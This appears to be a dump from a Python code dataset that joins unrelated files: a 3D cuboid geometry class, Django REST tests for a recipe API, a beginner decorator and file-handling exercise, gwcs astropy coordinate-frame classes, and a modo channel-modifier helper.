z (int, float): Z coordinate
"""
self.x = x
self.y = y
self.z = z
def contains(self, cub):
"""Tests if another cuboid is contained by this one
Arguments:
cub (Cuboid): The other cuboiud
Returns:
bool: True if it is inside this one, False otherwise
"""
return (cub.y >= self.y and
cub.x >= self.x and
cub.z >= self.z and
cub.y + cub.height <= self.y + self.height and
cub.x + cub.width <= self.x + self.width and
cub.z + cub.depth <= self.z + self.depth)
def intersects(self, cub, edges=False):
"""Detect intersections between this cuboid and cub.
Args:
cub (Cuboid): Cuboid to test for intersections.
edges (bool): Accept edge touching cuboids as intersects or not
Returns:
bool: True if the cuboids intersect, False otherwise
"""
# Not even touching
if (self.bottom > cub.top or
self.top < cub.bottom or
self.left > cub.right or
self.right < cub.left or
self.outeye > cub.ineye or
self.ineye < cub.outeye):
return False
# Discard edge intersects
if not edges:
if (self.bottom == cub.top or
self.top == cub.bottom or
self.left == cub.right or
self.right == cub.left or
self.outeye == cub.ineye or
self.ineye == cub.outeye):
return False
# Discard corner intersects
if (self.left == cub.right and self.bottom == cub.top and
self.outeye == cub.ineye or
self.left == cub.right and cub.bottom == self.top and
self.outeye == cub.ineye or
self.left == cub.right and self.bottom == cub.top and
cub.outeye == self.ineye or
self.left == cub.right and cub.bottom == self.top and
cub.outeye == self.ineye or
cub.left == self.right and self.bottom == cub.top and
self.outeye == cub.ineye or
cub.left == self.right and cub.bottom == self.top and
self.outeye == cub.ineye or
cub.left == self.right and self.bottom == cub.top and
cub.outeye == self.ineye or
cub.left == self.right and cub.bottom == self.top and
cub.outeye == self.ineye):
return False
return True
def intersection(self, cub, edges=False):
"""Returns the cuboid resulting of the intersection of this and cub
If the cuboids are only touching by their edges, and the
argument 'edges' is True the cuboid returned will have a volume of 0.
Returns None if there is no intersection.
Arguments:
cub (Cuboid): The other cuboid.
edges (bool): If true, touching edges are considered an
intersection, and a cuboid of 0 height or width or depth will be
returned
Returns:
Cuboid: Intersection.
None: There was no intersection.
"""
if not self.intersects(cub, edges=edges):
return None
bottom = max(self.bottom, cub.bottom)
left = max(self.left, cub.left)
top = min(self.top, cub.top)
right = min(self.right, cub.right)
outeye = max(self.outeye, cub.outeye)
ineye = min(self.ineye, cub.ineye)
return Cuboid(
left, bottom, outeye,
right - left, top - bottom, ineye - outeye)
def join(self, other):
"""Try to join a cuboid to this one.
If the result is also a cuboid and the operation is successful then
this cuboid is modified to the union.
Arguments:
other (Cuboid): Cuboid to join
Returns:
bool: True when successfully joined, False otherwise
"""
if self.contains(other):
return True
if other.contains(self):
self.x = other.x
self.y = other.y
self.z = other.z
self.width = other.width
self.height = other.height
self.depth = other.depth
return True
if not self.intersects(other, edges=True):
return False
# Other cuboid is Up/Down from this
if self.left == other.left and self.width == other.width and \
self.outeye == other.outeye and self.depth == self.depth:
y_min = min(self.bottom, other.bottom)
y_max = max(self.top, other.top)
self.y = y_min
self.height = y_max - y_min
return True
# Other cuboid is Right/Left from this
if self.bottom == other.bottom and self.height == other.height and \
self.outeye == other.outeye and self.depth == self.depth:
x_min = min(self.left, other.left)
x_max = max(self.right, other.right)
self.x = x_min
self.width = x_max - x_min
return True
# Other cuboid is Right/Left from this
if self.bottom == other.bottom and self.height == other.height and \
self.left == other.left and self.width == other.width:
z_min = min(self.outeye, other.outeye)
z_max = max(self.ineye, other.ineye)
self.z = z_min
self.depth = z_max - z_min
return True
return False
| 3.734375 | 4 |
app/recipe/tests/test_recipe_api.py | tahmadvand/recipe_app_api | 0 | 1196 | <reponame>tahmadvand/recipe_app_api
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
# use that for making our API requests
from core.models import Recipe, Tag, Ingredient
from ..serializers import RecipeSerializer, RecipeDetailSerializer
import tempfile
# allows you to call a function which will then create a temp file
# somewhere in the system and then you can remove that file after
# you've used it
import os
# this allows us to perform things like
# creating path names and also checking if files exist on the system
from PIL import Image
# pillow, this will import our image class which will let us then
# create test images which we can then upload to our API
RECIPES_URL = reverse('recipe:recipe-list')
# since we're going to need to access the URL in more
# or less all the tests let's assign that as a variable
# at top of the class in all capitals.
# app : identifier of the URL in the app
# /api/recipe/recipes
# /api/recipe/recipes/1/ (id) --> detail url
def image_upload_url(recipe_id):
"""Return URL for recipe image upload"""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
# generate our upload image url
# you're going to need the existing recipe ID in order to upload an image
def detail_url(recipe_id):
"""Return recipe detail URL"""
return reverse('recipe:recipe-detail', args=[recipe_id])
# name of the end point that the default router will create
# for our viewset because we're going to have a detail action
# this is how you specify arguments with the reverse function
# you just pass in args and then you pass in a list of the
# arguments you want to add
# here we have single item
def sample_tag(user, name='Main course'):
"""Create and return a sample tag"""
return Tag.objects.create(user=user, name=name)
def sample_ingredient(user, name='Cinnamon'):
"""Create and return a sample ingredient"""
return Ingredient.objects.create(user=user, name=name)
def sample_recipe(user, **params):
"""Create and return a sample recipe"""
defaults = {
'title': 'Sample recipe',
'time_minutes': 10,
'price': 5.00,
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
# convert the dictionary into the argument
# when you use the two asterisks when calling a
# function it has the reverse effect.
class PublicRecipeApiTests(TestCase):
"""Test unauthenticated recipe API access"""
def setUp(self):
self.client = APIClient()
def test_required_auth(self):
"""Test the authenticaiton is required"""
res = self.client.get(RECIPES_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Test authenticated recipe API access"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'<EMAIL>',
'<PASSWORD>'
)
self.client.force_authenticate(self.user)
def test_retrieve_recipes(self):
"""Test retrieving list of recipes"""
sample_recipe(user=self.user)
sample_recipe(user=self.user)
# we're going to access them by retrieving
# all of the recipes from our database.
res = self.client.get(RECIPES_URL)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test retrieving recipes for user"""
# test recipes are limited to the authenticated user.
user2 = get_user_model().objects.create_user(
'<EMAIL>',
'pass'
)
sample_recipe(user=user2)
sample_recipe(user=self.user)
res = self.client.get(RECIPES_URL)
# filter our recipes by the authenticated user
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
# many=true: this is because we were returning the list view
# or we wanted to simulate the list view in our serializer
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data, serializer.data)
def test_view_recipe_detail(self):
"""Test viewing a recipe detail"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
recipe.ingredients.add(sample_ingredient(user=self.user))
url = detail_url(recipe.id)
res = self.client.get(url)
serializer = RecipeDetailSerializer(recipe)
# in this case we just want to serialize a single object
self.assertEqual(res.data, serializer.data)
def test_create_basic_recipe(self):
"""Test creating recipe"""
payload = {
'title': 'Test recipe',
'time_minutes': 30,
'price': 10.00,
}
res = self.client.post(RECIPES_URL, payload)
# post this payload dictionary to our recipes URL.
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
# this is the standard HTTP response code for creating objects
# in an API.
recipe = Recipe.objects.get(id=res.data['id'])
# When you create an object using the Django rest framework the
# default behavior is that it will return a dictionary containing
# the created object This is how I know that if we do res.data and
# retrieve the id key this will get the id of the created object.
# Next what we're going to do is we're going to loop through each
# one of these keys and then we're going to check
# that is the correct value assigned to our recipe model.
for key in payload.keys():
self.assertEqual(payload[key], getattr(recipe, key))
# assertion for each one of these keys, check that it is
# equal to the same key in the recipe
# payload[key]: This will actually get the value of the
# key in our payload object
# getattr: that allows you to retrieve an attribute from
# an object by passing in a variable. (instead of recipe.key)
def test_create_recipe_with_tags(self):
"""Test creating a recipe with tags"""
tag1 = sample_tag(user=self.user, name='Tag 1')
tag2 = sample_tag(user=self.user, name='Tag 2')
payload = {
'title': 'Test recipe with two tags',
'tags': [tag1.id, tag2.id],
'time_minutes': 30,
'price': 10.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
# retrieve the created recipe
tags = recipe.tags.all()
# retrieve the tags that were created with the recipe
self.assertEqual(tags.count(), 2)
# because we expect two tags to be assigned.
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
# check if the tags that we created as our sample tags are
# the same as the tags that are in our queryset.
def test_create_recipe_with_ingredients(self):
"""Test creating recipe with ingredients"""
ingredient1 = sample_ingredient(user=self.user, name='Ingredient 1')
ingredient2 = sample_ingredient(user=self.user, name='Ingredient 2')
payload = {
'title': 'Test recipe with ingredients',
'ingredients': [ingredient1.id, ingredient2.id],
'time_minutes': 45,
'price': 15.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ingredients = recipe.ingredients.all()
# get the ingredients queryset
self.assertEqual(ingredients.count(), 2)
self.assertIn(ingredient1, ingredients)
self.assertIn(ingredient2, ingredients)
# test partial update and full update of an object
# there are two ways in which you can update an object using the
# API there's two different HTTP methods: put, patch
# patch: Patch is used to update the fields that are provided
# in the payload so the only fields that it will change are the
# fields that are provided and any fields that are omitted from
# the request will not be modified in the object that's being updated.
def test_partial_update_recipe(self):
"""Test updating a recipe with patch"""
# make a request to change a field in our recipe.
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
# add a tag to the recipe
new_tag = sample_tag(user=self.user, name='Curry')
# add a new tag and what we're going to do is we're going
# to swap out this tag that we create here and we're going
# to replace it with a new tag
payload = {'title': 'Partially Updated sample recipe',
'tags': [new_tag.id]}
# tags will be replaced with this new tag so the existing tag that
# we created won't be assigned to it
url = detail_url(recipe.id)
# the way that you update an object using the Django rest framework
# view sets is you use the detail URL so that is the URL of the
# recipe with the ID of the recipe that we want to update.
self.client.patch(url, payload)
# make request
# We're going to retrieve an update to the recipe from the
# database and then we're going to check the fields that
# are assigned and just make sure they match what we expect.
recipe.refresh_from_db()
# refreshes the details in our recipe from the database
# typically when you create a new model and you have a
# reference to a model the details of that won't change
# unless you do refresh from dB if the values have changed
# in the database.
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(new_tag, tags)
# check that the tag new tag is in the tags that we retrieved
# test full update
# put: it will replace the object that we're updating with the full
# object that is provided in the request that means if you exclude
# any fields in the payload those fields will actually be removed
# from the object that you're updating
def test_full_update_recipe(self):
"""Test updating a recipe with put"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
payload = {
'title': 'Fully Updated sample recipe',
'time_minutes': 25,
'price': 5.00
}
url = detail_url(recipe.id)
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
# we will check that the tags assigned are zero now as I explained
# because when we do a HTTP put if we omit a field
# that should clear the value of that field so now our recipe
# that did have a sample tag assigned should not have any tags
# assigned
class RecipeImageUploadTests(TestCase):
# what happens at the setup of the test
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user('user', 'testpass')
self.client.force_authenticate(self.user)
# authenticate our user
self.recipe = sample_recipe(user=self.user)
# after the test runs it runs tear down
def tearDown(self):
self.recipe.image.delete()
# make sure that our file system is kept clean after our test
# removing all of the test files that we create
# delete the image if it exists in the recipe
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
# going to use the sample recipe that gets created
# it creates a named temporary file on the system at a random
# location usually in the /temp folder
# create a temporary file we're going to write an image
# to that file and then we're going to upload that file
# through the API like you would with a HTTP POST and then
# we're going to run some assertions to check that it
# uploaded correctly
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
# creates black square
img.save(ntf, format='JPEG')
ntf.seek(0)
# it's the way that Python reads files so because we've
# saved the file it will be the seeking will be done to the
# end of the file so if you try to access it then it would
# just be blank because you've already read up to the end
# of the file so use this seek function to set
# the pointer back to the beginning of the file
res = self.client.post(url, {'image': ntf}, format='multipart')
# assertions
# refreshing the database for our recipe
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
# check that the images in the response so that's the path to
# the image that should be accessible
self.assertIn('image', res.data)
# check that the path exists for the image that is saved to our model
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_filter_recipes_by_tags(self):
"""Test returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetable curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3 = sample_recipe(user=self.user, title='Fish and chips')
res = self.client.get(
RECIPES_URL,
{'tags': '{},{}'.format(tag1.id, tag2.id)}
)
# this will create a comma separated list string and assign
# it to the tags get parameter
# if our filtering is working
# should only return the first two recipe
# test the response:
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
# serialize the recipes and we're going to check if
# they exist in the responses returned
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
# check the return result
def test_filter_recipes_by_ingredients(self):
"""Test returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title='Posh beans on toast')
recipe2 = sample_recipe(user=self.user, title='Chicken cacciatore')
ingredient1 = sample_ingredient(user=self.user, name='Feta cheese')
ingredient2 = sample_ingredient(user=self.user, name='Chicken')
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3 = sample_recipe(user=self.user, title='Steak and mushrooms')
# test API
res = self.client.get(
RECIPES_URL,
{'ingredients': '{},{}'.format(ingredient1.id, ingredient2.id)}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
| 2.75 | 3 |
Assignment 1 n 2 Day 8.py | paju3125/LetsUpgrade-Python-B7 | 0 | 1197 | <gh_stars>0
# Assignment 1 Day 8
# write a decorator function for taking input for you
# any kind of function you want to build
def getInput(calculate_arg_fuc):
def wrap_function():
print("Enter two numbers ")
a=int(input("Enter first number = "))
b=int(input("Enter second number = "))
calculate_arg_fuc(a,b)
return wrap_function
@getInput
def addition(num1,num2):
print("Addition = ",num1+num2)
@getInput
def subtraction(num1,num2):
print("Subtraction = ",num1-num2)
@getInput
def multiplication(num1,num2):
print("Multiplication = ",num1*num2)
@getInput
def division(num1,num2):
print("Division = ",num1/num2)
addition()
subtraction()
multiplication()
division()
# Assignment 2 day 8
# you need to develop a python program to open a file in read only mode and
# try writing something to it and handlethe subsequent errorusing Exception Handling
try:
f=open("abc.txt","r");
f.write("Heyy, i am prajval");
f.close();
except:
print("File is in read only mode...")
| 3.953125 | 4 |
gwcs/coordinate_frames.py | migueldvb/gwcs | 0 | 1198 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Defines coordinate frames and ties them to data axes.
"""
from __future__ import absolute_import, division, unicode_literals, print_function
import numpy as np
from astropy import units as u
from astropy import utils as astutil
from astropy import coordinates as coord
from astropy.extern import six
from . import utils as gwutils
__all__ = ['Frame2D', 'CelestialFrame', 'SpectralFrame', 'CompositeFrame',
'CoordinateFrame']
STANDARD_REFERENCE_FRAMES = [frame.upper() for frame in coord.builtin_frames.__all__]
STANDARD_REFERENCE_POSITION = ["GEOCENTER", "BARYCENTER", "HELIOCENTER",
"TOPOCENTER", "LSR", "LSRK", "LSRD",
"GALACTIC_CENTER", "LOCAL_GROUP_CENTER"]
class CoordinateFrame(object):
"""
Base class for CoordinateFrames.
Parameters
----------
naxes : int
Number of axes.
axes_type : str
One of ["SPATIAL", "SPECTRAL", "TIME"]
axes_order : tuple of int
A dimension in the input data that corresponds to this axis.
reference_frame : astropy.coordinates.builtin_frames
Reference frame (usually used with output_frame to convert to world coordinate objects).
reference_position : str
Reference position - one of `STANDARD_REFERENCE_POSITION`
unit : list of astropy.units.Unit
Unit for each axis.
axes_names : list
Names of the axes in this frame.
name : str
Name of this frame.
"""
def __init__(self, naxes, axes_type, axes_order, reference_frame=None,
reference_position=None, unit=None, axes_names=None,
name=None):
self._naxes = naxes
self._axes_order = tuple(axes_order)
if isinstance(axes_type, six.string_types):
self._axes_type = (axes_type,)
else:
self._axes_type = tuple(axes_type)
self._reference_frame = reference_frame
if unit is not None:
if astutil.isiterable(unit):
unit = tuple(unit)
else:
unit = (unit,)
if len(unit) != naxes:
raise ValueError("Number of units does not match number of axes.")
else:
self._unit = tuple([u.Unit(au) for au in unit])
if axes_names is not None:
if isinstance(axes_names, six.string_types):
axes_names = (axes_names,)
else:
axes_names = tuple(axes_names)
if len(axes_names) != naxes:
raise ValueError("Number of axes names does not match number of axes.")
else:
axes_names = tuple([""] * naxes)
self._axes_names = axes_names
if name is None:
self._name = self.__class__.__name__
else:
self._name = name
if reference_position is not None:
self._reference_position = reference_position
else:
self._reference_position = None
super(CoordinateFrame, self).__init__()
def __repr__(self):
fmt = '<{0}(name="{1}", unit={2}, axes_names={3}, axes_order={4}'.format(
self.__class__.__name__, self.name,
self.unit, self.axes_names, self.axes_order)
if self.reference_position is not None:
fmt += ', reference_position="{0}"'.format(self.reference_position)
if self.reference_frame is not None:
fmt += ", reference_frame={0}".format(self.reference_frame)
fmt += ")>"
return fmt
def __str__(self):
if self._name is not None:
return self._name
else:
return self.__class__.__name__
@property
def name(self):
""" A custom name of this frame."""
return self._name
@name.setter
def name(self, val):
""" A custom name of this frame."""
self._name = val
@property
def naxes(self):
""" The number of axes intheis frame."""
return self._naxes
@property
def unit(self):
"""The unit of this frame."""
return self._unit
@property
def axes_names(self):
""" Names of axes in the frame."""
return self._axes_names
@property
def axes_order(self):
""" A tuple of indices which map inputs to axes."""
return self._axes_order
@property
def reference_frame(self):
return self._reference_frame
@property
def reference_position(self):
try:
return self._reference_position
except AttributeError:
return None
def input_axes(self, start_frame=None):
"""
Computes which axes in `start_frame` contribute to each axis in the current frame.
Parameters
----------
start_frame : ~gwcs.coordinate_frames.CoordinateFrame
A frame in the WCS pipeline
The transform between start_frame and the current frame is used to compute the
mapping inputs: outputs.
"""
sep = self._separable(start_frame)
inputs = []
for ax in self.axes_order:
inputs.append(list(sep[ax].nonzero()[0]))
return inputs
@property
def axes_type(self):
""" Type of this frame : 'SPATIAL', 'SPECTRAL', 'TIME'. """
return self._axes_type
def coordinates(self, *args):
""" Create world coordinates object"""
raise NotImplementedError("Subclasses may implement this")
class CelestialFrame(CoordinateFrame):
"""
Celestial Frame Representation
Parameters
----------
axes_order : tuple of int
A dimension in the input data that corresponds to this axis.
reference_frame : astropy.coordinates.builtin_frames
A reference frame.
reference_position : str
Reference position.
unit : str or units.Unit instance or iterable of those
Units on axes.
axes_names : list
Names of the axes in this frame.
name : str
Name of this frame.
"""
def __init__(self, axes_order=None, reference_frame=None,
unit=None, axes_names=None,
name=None):
naxes = 2
if reference_frame is not None:
if reference_frame.name.upper() in STANDARD_REFERENCE_FRAMES:
_axes_names = list(reference_frame.representation_component_names.values())
if 'distance' in _axes_names:
_axes_names.remove('distance')
if axes_names is None:
axes_names = _axes_names
naxes = len(_axes_names)
_unit = list(reference_frame.representation_component_units.values())
if unit is None and _unit:
unit = _unit
if axes_order is None:
axes_order = tuple(range(naxes))
if unit is None:
unit = tuple([u.degree] * naxes)
axes_type = ['SPATIAL'] * naxes
super(CelestialFrame, self).__init__(naxes=naxes, axes_type=axes_type,
axes_order=axes_order,
reference_frame=reference_frame,
unit=unit,
axes_names=axes_names,
name=name)
def coordinates(self, *args):
"""
Create a SkyCoord object.
Parameters
----------
args : float
inputs to wcs.input_frame
"""
# Reorder axes if necesary.
try:
return coord.SkyCoord(*args, unit=self.unit, frame=self._reference_frame)
except:
raise
class SpectralFrame(CoordinateFrame):
"""
Represents Spectral Frame
Parameters
----------
axes_order : tuple or int
A dimension in the input data that corresponds to this axis.
reference_frame : astropy.coordinates.builtin_frames
Reference frame (usually used with output_frame to convert to world coordinate objects).
unit : str or units.Unit instance
Spectral unit.
axes_names : str
Spectral axis name.
name : str
Name for this frame.
"""
def __init__(self, axes_order=(0,), reference_frame=None, unit=None,
axes_names=None, name=None, reference_position=None):
super(SpectralFrame, self).__init__(naxes=1, axes_type="SPECTRAL", axes_order=axes_order,
axes_names=axes_names, reference_frame=reference_frame,
unit=unit, name=name,
reference_position=reference_position)
def coordinates(self, *args):
if np.isscalar(args):
return args * self.unit[0]
else:
return args[0] * self.unit[0]
class CompositeFrame(CoordinateFrame):
"""
Represents one or more frames.
Parameters
----------
frames : list
List of frames (TimeFrame, CelestialFrame, SpectralFrame, CoordinateFrame).
name : str
Name for this frame.
"""
def __init__(self, frames, name=None):
self._frames = frames[:]
naxes = sum([frame._naxes for frame in self._frames])
axes_type = list(range(naxes))
unit = list(range(naxes))
axes_names = list(range(naxes))
axes_order = []
for frame in frames:
axes_order.extend(frame.axes_order)
for frame in frames:
for ind, axtype, un, n in zip(frame.axes_order, frame.axes_type,
frame.unit, frame.axes_names):
axes_type[ind] = axtype
axes_names[ind] = n
unit[ind] = un
if len(np.unique(axes_order)) != len(axes_order):
raise ValueError("Incorrect numbering of axes, "
"axes_order should contain unique numbers, "
"got {}.".format(axes_order))
super(CompositeFrame, self).__init__(naxes, axes_type=axes_type,
axes_order=axes_order,
unit=unit, axes_names=axes_names,
name=name)
@property
def frames(self):
return self._frames
def __repr__(self):
return repr(self.frames)
def coordinates(self, *args):
coo = []
for frame in self.frames:
fargs = [args[i] for i in frame.axes_order]
print(frame, fargs, frame.axes_order)
coo.append(frame.coordinates(*fargs))
return coo
class Frame2D(CoordinateFrame):
"""
A 2D coordinate frame.
Parameters
----------
axes_order : tuple of int
A dimension in the input data that corresponds to this axis.
unit : list of astropy.units.Unit
Unit for each axis.
axes_names : list
Names of the axes in this frame.
name : str
Name of this frame.
"""
def __init__(self, axes_order=(0, 1), unit=(u.pix, u.pix), axes_names=('x', 'y'),
name=None):
super(Frame2D, self).__init__(2, ["SPATIAL", "SPATIAL"], axes_order, name=name,
axes_names=axes_names, unit=unit)
def coordinates(self, *args):
args = [args[i] for i in self.axes_order]
coo = tuple([arg * un for arg, un in zip(args, self.unit)])
return coo
| 2.828125 | 3 |
modox/chan_modifier.py | lukpazera/modox | 11 | 1199 |
import lx
import modo
import select
import item
from run import run
class ChannelModifierUtils(object):
@classmethod
def attachModifierToItem(cls, modifierModoItem, hostModoItem):
"""
Allows for attaching modifier to locator type item.
Attached item will show up under the locator item in item list
(you can unfold it with a little plus icons next to item name in item list).
Attached modifiers are getting deleted together with locator they are attached to.
Parameters
----------
modifierModoItem : modo.Item
Modifier item that you want to attach.
hostModoItem : modo.Item
Locator type item you want to attach modifier to.
"""
item.ItemUtils.addForwardGraphConnections(modifierModoItem, hostModoItem, 'chanMods')
class TransformConstraintOperation(object):
POSITION = 'pos'
ROTATION = 'rot'
SCALE = 'scl'
class CMTransformConstraint(object):
"""
This class represents Transform Constraint channel modifier.
Parameters
----------
modoItem : modo.Item
The constraint modo item.
"""
Operation = TransformConstraintOperation
@classmethod
def new(cls, assemblyItem, hostItem, name='TransformConstraint'):
"""
Adds new transform constraint to the scene.
Parameters
----------
assemblyItem : modo.Item
This is assembly item to which the constraint will be added.
Passing this item is mandatory. However, if you don't want to add constraints
to any assembly pass an item that is not a group.
This doesn't throw an error and it doesn't add constraint to any groups either.
hostItem : modo.Item
Constraint can be attached to an item such that it'll be under this item
in item list. It'll also get deleted when the host item is deleted.
name : str
Name for new constraint item.
Returns
-------
CMTransformConstraint
"""
itemSelection = select.ItemSelection()
itemSelection.clear()
run('modifier.create "cmTransformConstraint:rot" item:{%s} insert:false' % assemblyItem.id)
cnsItem = itemSelection.getOfTypeModo("cmTransformConstraint")[0]
cnsItem.name = name
ChannelModifierUtils.attachModifierToItem(cnsItem, hostItem)
return CMTransformConstraint(cnsItem)
@property
def operation(self):
"""
Gets the type of the constraint.
Returns
-------
str
One of TransformConstraintOperation constants.
"""
return self._item.channel('operation').get()
@property
def inputChannel(self):
return self._item.channel('matrixInput')
@property
def outputChannel(self):
return self._item.channel('matrixOutput')
@property
def isRotationConstraint(self):
"""
Tests if this is rotation constraint.
Returns
-------
bool
"""
return self.operation == self.Operation.ROTATION
@property
def offset(self):
"""
Gets the constraint offset vector.
Returns
-------
modo.Vector3
"""
x = self._item.channel('offset.X').get()
y = self._item.channel('offset.Y').get()
z = self._item.channel('offset.Z').get()
return modo.Vector3(x, y, z)
@offset.setter
def offset(self, offsetVec):
"""
Sets new offset for the constraint.
Parameters
----------
offsetVec : modo.Vector3
"""
self._item.channel('offset.X').set(offsetVec[0], 0.0, key=False, action=lx.symbol.s_ACTIONLAYER_SETUP)
self._item.channel('offset.Y').set(offsetVec[1], 0.0, key=False, action=lx.symbol.s_ACTIONLAYER_SETUP)
self._item.channel('offset.Z').set(offsetVec[2], 0.0, key=False, action=lx.symbol.s_ACTIONLAYER_SETUP)
@property
def modoItem(self):
return self._item
# -------- Private methods
def __init__(self, modoItem):
if modoItem.type != 'cmTransformConstraint':
raise TypeError
self._item = modoItem | 2.671875 | 3 |
Subsets and Splits